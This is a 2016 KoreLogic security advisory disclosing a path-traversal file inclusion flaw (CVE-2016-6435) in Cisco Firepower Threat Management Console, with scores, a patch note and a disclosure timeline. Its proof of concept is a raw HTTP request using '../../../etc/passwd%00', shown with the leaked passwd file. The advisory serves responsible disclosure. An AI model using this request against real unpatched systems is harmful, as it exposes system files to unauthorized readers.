Cisco Firepower Threat Management Console Local File Inclusion

Credit: Matt Bergin
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion Title: Cisco Firepower Threat Management Console Local File Inclusion Advisory ID: KL-001-2016-006 Publication Date: 2016.10.05 Publication URL: 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-73: External Control of File Name or Path Impact: Information Disclosure Attack vector: HTTP CVE-ID: CVE-2016-6435 2. Vulnerability Description An authenticated user can access arbitrary files on the local system. 3. Technical Description Requests that take a file path do not properly filter what files can be requested. The webserver does not run as root, so files such as /etc/shadow are not readable. GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3 Connection: close HTTP/1.1 200 OK Date: Fri, 22 Apr 2016 23:58:41 GMT Server: Apache Content-Disposition: attachment; filename=passwd X-Frame-Options: SAMEORIGIN Connection: close Content-Type: application/octet-stream Content-Length: 623 root:x:0:0:Operator:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin nobody:x:99:99:nobody:/:/sbin/nologin sshd:x:33:33:sshd:/:/sbin/nologin www:x:67:67:HTTP server:/var/www:/sbin/nologin sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin admin:x:100:100::/Volume/home/admin:/bin/sh casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability in version 6.1. Vendor acknowledgement available at: 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. 2016.06.30 - Cisco acknowledges receipt of vulnerability report. 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product. 2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts. 2016.09.15 - Cisco confirms remediation is underway and soon to be completed. 2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05. 2016.10.05 - Public disclosure. 7. Proof of Concept See Technical Description The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. Our public vulnerability disclosure policy is available at:


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